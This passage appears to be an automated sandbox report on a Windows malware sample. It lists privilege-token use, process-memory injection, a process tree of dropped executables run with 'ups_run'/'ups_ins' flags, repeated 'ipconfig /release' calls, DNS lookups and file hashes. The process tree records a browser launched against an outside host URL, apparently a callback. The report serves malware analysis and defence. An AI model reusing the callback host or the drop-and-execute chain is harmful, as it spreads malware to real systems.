N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Temp\i_kicavpnhfa.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_kfzxrpkhcz.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_zusmkecwup.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_zxrpjhczur.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_trljebwuom.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_ojgbztrljd.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_oigtqljdbv.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_fdyvqnigay.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_axsqkicaus.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_usmkfcxvpn.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_zxspkicamk.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_xrpjhczusm.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_uomgezwroj.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_rljdbwtomg.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_wqoigbytql.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_tnlfdyvqoi.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_qnigaysqki.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_qkicausnkf.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_upnhfzxspk.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_smkecwupmh.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2624 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2680 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2680 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2680 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 3840 wrote to memory of 2616 N/A C:\Temp\kfzxrpkhcz.exe C:\temp\CreateProcess.exe
PID 3840 wrote to memory of 2616 N/A C:\Temp\kfzxrpkhcz.exe C:\temp\CreateProcess.exe
PID 3840 wrote to memory of 2616 N/A C:\Temp\kfzxrpkhcz.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2012 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2012 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2012 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4644 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4644 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4644 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 4408 wrote to memory of 1556 N/A C:\Temp\zusmkecwup.exe C:\temp\CreateProcess.exe
PID 4408 wrote to memory of 1556 N/A C:\Temp\zusmkecwup.exe C:\temp\CreateProcess.exe
PID 4408 wrote to memory of 1556 N/A C:\Temp\zusmkecwup.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1796 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1796 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1796 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2024 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2024 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2024 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 3856 wrote to memory of 3852 N/A C:\Temp\zxrpjhczur.exe C:\temp\CreateProcess.exe
PID 3856 wrote to memory of 3852 N/A C:\Temp\zxrpjhczur.exe C:\temp\CreateProcess.exe
PID 3856 wrote to memory of 3852 N/A C:\Temp\zxrpjhczur.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2404 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2404 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2404 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1508 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1508 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1508 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 2224 wrote to memory of 940 N/A C:\Temp\trljebwuom.exe C:\temp\CreateProcess.exe
PID 2224 wrote to memory of 940 N/A C:\Temp\trljebwuom.exe C:\temp\CreateProcess.exe
PID 2224 wrote to memory of 940 N/A C:\Temp\trljebwuom.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1368 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1368 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1368 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3864 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3864 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3864 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 628 wrote to memory of 4412 N/A C:\Temp\ojgbztrljd.exe C:\temp\CreateProcess.exe
PID 628 wrote to memory of 4412 N/A C:\Temp\ojgbztrljd.exe C:\temp\CreateProcess.exe
PID 628 wrote to memory of 4412 N/A C:\Temp\ojgbztrljd.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4340 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4340 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4340 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2008 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2008 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe

Processes

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe

"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"

C:\Temp\dxvpnifaysqkicav.exe

C:\Temp\dxvpnifaysqkicav.exe run

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3468 CREDAT:17410 /prefetch:2

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\kicavpnhfa.exe ups_run

C:\Temp\kicavpnhfa.exe

C:\Temp\kicavpnhfa.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_kicavpnhfa.exe ups_ins

C:\Temp\i_kicavpnhfa.exe

C:\Temp\i_kicavpnhfa.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\kfzxrpkhcz.exe ups_run

C:\Temp\kfzxrpkhcz.exe

C:\Temp\kfzxrpkhcz.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_kfzxrpkhcz.exe ups_ins

C:\Temp\i_kfzxrpkhcz.exe

C:\Temp\i_kfzxrpkhcz.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\zusmkecwup.exe ups_run

C:\Temp\zusmkecwup.exe

C:\Temp\zusmkecwup.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_zusmkecwup.exe ups_ins

C:\Temp\i_zusmkecwup.exe

C:\Temp\i_zusmkecwup.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\zxrpjhczur.exe ups_run

C:\Temp\zxrpjhczur.exe

C:\Temp\zxrpjhczur.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_zxrpjhczur.exe ups_ins

C:\Temp\i_zxrpjhczur.exe

C:\Temp\i_zxrpjhczur.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\trljebwuom.exe ups_run

C:\Temp\trljebwuom.exe

C:\Temp\trljebwuom.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_trljebwuom.exe ups_ins

C:\Temp\i_trljebwuom.exe

C:\Temp\i_trljebwuom.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\ojgbztrljd.exe ups_run

C:\Temp\ojgbztrljd.exe

C:\Temp\ojgbztrljd.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_ojgbztrljd.exe ups_ins

C:\Temp\i_ojgbztrljd.exe

C:\Temp\i_ojgbztrljd.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\oigtqljdbv.exe ups_run

C:\Temp\oigtqljdbv.exe

C:\Temp\oigtqljdbv.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_oigtqljdbv.exe ups_ins

C:\Temp\i_oigtqljdbv.exe

C:\Temp\i_oigtqljdbv.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\fdyvqnigay.exe ups_run

C:\Temp\fdyvqnigay.exe

C:\Temp\fdyvqnigay.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_fdyvqnigay.exe ups_ins

C:\Temp\i_fdyvqnigay.exe

C:\Temp\i_fdyvqnigay.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\axsqkicaus.exe ups_run

C:\Temp\axsqkicaus.exe

C:\Temp\axsqkicaus.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_axsqkicaus.exe ups_ins

C:\Temp\i_axsqkicaus.exe

C:\Temp\i_axsqkicaus.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\usmkfcxvpn.exe ups_run

C:\Temp\usmkfcxvpn.exe

C:\Temp\usmkfcxvpn.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_usmkfcxvpn.exe ups_ins

C:\Temp\i_usmkfcxvpn.exe

C:\Temp\i_usmkfcxvpn.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\zxspkicamk.exe ups_run

C:\Temp\zxspkicamk.exe

C:\Temp\zxspkicamk.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_zxspkicamk.exe ups_ins

C:\Temp\i_zxspkicamk.exe

C:\Temp\i_zxspkicamk.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\xrpjhczusm.exe ups_run

C:\Temp\xrpjhczusm.exe

C:\Temp\xrpjhczusm.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_xrpjhczusm.exe ups_ins

C:\Temp\i_xrpjhczusm.exe

C:\Temp\i_xrpjhczusm.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\uomgezwroj.exe ups_run

C:\Temp\uomgezwroj.exe

C:\Temp\uomgezwroj.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_uomgezwroj.exe ups_ins

C:\Temp\i_uomgezwroj.exe

C:\Temp\i_uomgezwroj.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\rljdbwtomg.exe ups_run

C:\Temp\rljdbwtomg.exe

C:\Temp\rljdbwtomg.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_rljdbwtomg.exe ups_ins

C:\Temp\i_rljdbwtomg.exe

C:\Temp\i_rljdbwtomg.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\wqoigbytql.exe ups_run

C:\Temp\wqoigbytql.exe

C:\Temp\wqoigbytql.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_wqoigbytql.exe ups_ins

C:\Temp\i_wqoigbytql.exe

C:\Temp\i_wqoigbytql.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\tnlfdyvqoi.exe ups_run

C:\Temp\tnlfdyvqoi.exe

C:\Temp\tnlfdyvqoi.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_tnlfdyvqoi.exe ups_ins

C:\Temp\i_tnlfdyvqoi.exe

C:\Temp\i_tnlfdyvqoi.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\qnigaysqki.exe ups_run

C:\Temp\qnigaysqki.exe

C:\Temp\qnigaysqki.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_qnigaysqki.exe ups_ins

C:\Temp\i_qnigaysqki.exe

C:\Temp\i_qnigaysqki.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\qkicausnkf.exe ups_run

C:\Temp\qkicausnkf.exe

C:\Temp\qkicausnkf.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_qkicausnkf.exe ups_ins

C:\Temp\i_qkicausnkf.exe

C:\Temp\i_qkicausnkf.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\upnhfzxspk.exe ups_run

C:\Temp\upnhfzxspk.exe

C:\Temp\upnhfzxspk.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_upnhfzxspk.exe ups_ins

C:\Temp\i_upnhfzxspk.exe

C:\Temp\i_upnhfzxspk.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\smkecwupmh.exe ups_run

C:\Temp\smkecwupmh.exe

C:\Temp\smkecwupmh.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_smkecwupmh.exe ups_ins

C:\Temp\i_smkecwupmh.exe

C:\Temp\i_smkecwupmh.exe ups_ins

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 182.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.51.23.in-addr.arpa udp
US 8.8.8.8:53 xytets.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 xytets.com udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 175.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Temp\dxvpnifaysqkicav.exe

MD5 44def011da7bae1dae45f92e128fa85f
SHA1 76d04f9856441bed55e1811270db0baa6ef02ff3
SHA256 de5acecc1da4f49fd7f63018c91cfacb38d125d83d5a2ef7faefecbcb65fca86
SHA512 6086342f564d3ba422c88858642beacf61040f0b1afd75d3377bcfd7a24bdc3c7ca499a265c5feeda14180a6380be8141d7e5a07d2db2a3a334040dff661db54

C:\Temp\CreateProcess.exe

MD5 e055efecfbdc7954ce003c795f5ed9c1
SHA1 c79876cf3c73987494e466d2b248d114fb1003af
SHA256 cb2a34c2ddc6ccd8a96f9fbea6519d0c96d35b6f55d88fb627fd3f4c03ffb14d
SHA512 1a1b2a5eefc2feebb316cb28fde689c44dd05651bcd5597dc4a693402c7c804fd8b42ed8d06fa604bde20ed8dca79ad6cc15d1f876de027474842da1b66c3c86

C:\Temp\kicavpnhfa.exe

MD5 530796522950afebfdc8f2bdbb279e49
SHA1 f9fd78a75543bce2d17fe1575b58b2c914ed44a4
SHA256 9a41e3958ccc92deeb851a33f8a32162ed709223243b1f29b0a9c67fb08cf2a9
SHA512 9b86ed072aa023ab851e9a0bf86777d1f41afe485a4b1a50a54513566578afff62697eeb1cf8d40599b63eebcf1ff121fa0c6ea0561b32e13b7bb247b7362956

C:\Temp\i_kicavpnhfa.exe

MD5 b16e64309bc17abb42371096ef067195
SHA1 de243f1013861c96c2a4a2141e56b8e5659496f3
SHA256 e1efc058c0b97b1d51a639151e67d0603c201418eeef78d91dbfe304562d96ca
SHA512 0339d41682609d623d95b80423a8b056869b5dbbad1cdca09537b370404dcd6855b0b2ce5e0058a979088b0b04fbb0cb3a205755a7a7d443820c4f4ab6f7f53f

C:\Temp\kfzxrpkhcz.exe

MD5 d09cdde38b767563387ba2dba4187488
SHA1 04457550875c9c8e04b93804374a7ba702382d59
SHA256 1d8f9c461d6cb9e71d366568390aa016ba7d39cb6a2535318dada169c8e144ed
SHA512 d600c363e20a8e43f447acd709d549887858ca9284de1a9e8266ee49c19bbcdc8e06c0344a652f59068eec992df3fd973556ff77602e07736b2ac2b31d72dabb

C:\Temp\i_kfzxrpkhcz.exe

MD5 835e6cb6983dbf37f721455f5fe7e987
SHA1 17f98fdf22d4e43e3cb0069940053bcb365dc6b5
SHA256 453ff54fec9acb757ddb4370300a61eae80238f01d8757908e9c0c09a7aa9992
SHA512 be1ce2152fb1a3bac77093ad0866a317082af493d6cf02c02846e06ee3d5949ac55b68bfd37a742e4b68e124602af2238d5471d93909ebe7bc2ae37ebb8ba214

C:\Temp\zusmkecwup.exe

MD5 9739d6217c3d16edda951e570c7fe103
SHA1 b6d8afb168b8d7e5d0f9f962df9e77677a0a7286
SHA256 5070fa3741cf35c73d55a5afba7b28c460234d7a1a44791db098e4f29fdf832d
SHA512 ae9caa342dd819f96c249a3a4e2d3b233d2f2c853a28c0591eac2b8310f55083bbec5a53d218b104cd4a59d970545ff63e1e70ba41c80ccc9b517b828797d12c

C:\Temp\i_zusmkecwup.exe

MD5 7754ca99a9614c62b630fe050626ba48
SHA1 d9f4d3079a9ce932b0acb9aef1eed2dab8f41f49
SHA256 1fef18d0139349b965aec7716b6732107c212a7c8670a866e0049a30d03aa8ec
SHA512 673c91a3f2703d59f9bb86061bd9690eda986cb8d2f81840af0531b0830e187ae22542b5ecb1d78d9bb24505438b58420cd857e6fd8e142090db765165d54a7f

C:\Temp\zxrpjhczur.exe

MD5 91970ad64ee323f5b95af40f413922ec
SHA1 6d09bf0d515ea78842b6febefc4c979ca544e77f
SHA256 07b79cd1c24e41c6f24795162d7e5656d46d9663fed13fa57bf8d4e24d986b8f
SHA512 aa82136a12cd01e84d527e4d48d49e4658f99da4fd8012066533058dd1477e33f771715231e7166e9ac62536e589f98d770b952005326c09c586f743afb72c7d

C:\Temp\i_zxrpjhczur.exe

MD5 36ed5c47843368dcc32845f3f11f6e06
SHA1 4498e5419bc9521fd1ddc06900926612352c901f
SHA256 36b5dbcf7f3ba7663124749e61af020dc9721b4353a252b8b0c6c1c886cee444
SHA512 ade4a67e2c23abf7f291584f8f585ce7f371279a9a22ba3790541ff1b42000f0053d6628fac563c2ef53ae7e5dfd0294d9d6817741a65a69853679dbd6e53b08

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 65ff4e1a660b03c192195dc09416d8a8
SHA1 c8e9c1b5d0e74e2f581eaa06d77db42ddb2b24b9
SHA256 25f890730498e80c6b85f0ca869917f45af6cadbb427695a615181eac3285dc2
SHA512 3efa3c79d74861659b4e6e97b362fb4943eeae2e81425029bbf407fb2c4c914bc2d2b43bc8164e9ed050cdb24f411a8582e086eb3557227ad79ec2256c5a52ba

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 bd4fd3d4277e6b560fe9824b76237114
SHA1 dc1f3500398cff1040cef8e053aa76b33c33da15
SHA256 ffec78fd67cf61e5dd5a2735d04c423e700f6ab348ca789d36a2734aa99a6636
SHA512 ffb5a07b2601eda753284322519b85aca75d6f820e69152cffaba775dac5336254919ea05a4dc118859e4b1ad83e10942c2a588028c4c1151f587d0603bf76ce

C:\Temp\trljebwuom.exe

